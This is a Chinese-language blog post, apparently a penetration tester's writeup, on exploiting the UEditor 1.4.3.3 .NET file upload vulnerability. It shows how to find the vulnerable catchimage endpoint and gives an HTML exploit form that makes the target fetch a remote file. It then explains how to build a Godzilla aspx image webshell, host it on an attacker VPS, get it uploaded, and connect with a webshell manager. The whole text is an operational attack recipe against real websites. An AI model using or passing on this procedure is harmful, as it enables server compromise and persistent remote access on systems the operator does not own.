Ueditor_1.4.3.3_.NET版本文件上传漏洞利用

本文最后更新于 2024年10月22日 下午

影响范围

UEditor v1.4.3.3

漏洞验证

访问路径目标路径/Content/ueditor/net/controller.ashx?action=catchimage,但有时路径也会被修改,主要是看这个路径”/controller.ashx?action=”

若返回”参数错误:没有指定抓取源”,则说明存在该漏洞

实战案例:

  1. 先在编辑处发现了ueditor特征

image

  1. F12查看请求的接口

image

发现了这个接口,可以用来验证是否存在Ueditor1.4.3.3 .NET版本文件上传漏洞

  1. 打开该接口路径,发现直接就是”/controller.ashx?action=”路径,而不是默认路径”/Content/ueditor/net/controller.ashx?action”,于是要根据实际情况去寻找该接口

image

  1. 验证漏洞是否存在,构造接口”/controller.ashx?action=catchimage”

image

验证成功,漏洞大概率存在

漏洞利用

  1. 构造本地test.html文件,注意修改action为目标漏洞路径
1
2
3
4
<form action=" http://xxx.com/Content/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr:<input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

  1. 使用哥斯拉制作aspx图片马,上传至VPS某个空目录,在该目录下,使用python开启临时http服务,使得能通过公网访问到该aspx木马

    image

image

  1. 本地打开test.html文件,输入aspx木马的地址

image

  1. 上传成功后,会返回木马地址,使用Webshell管理工具连接即可

image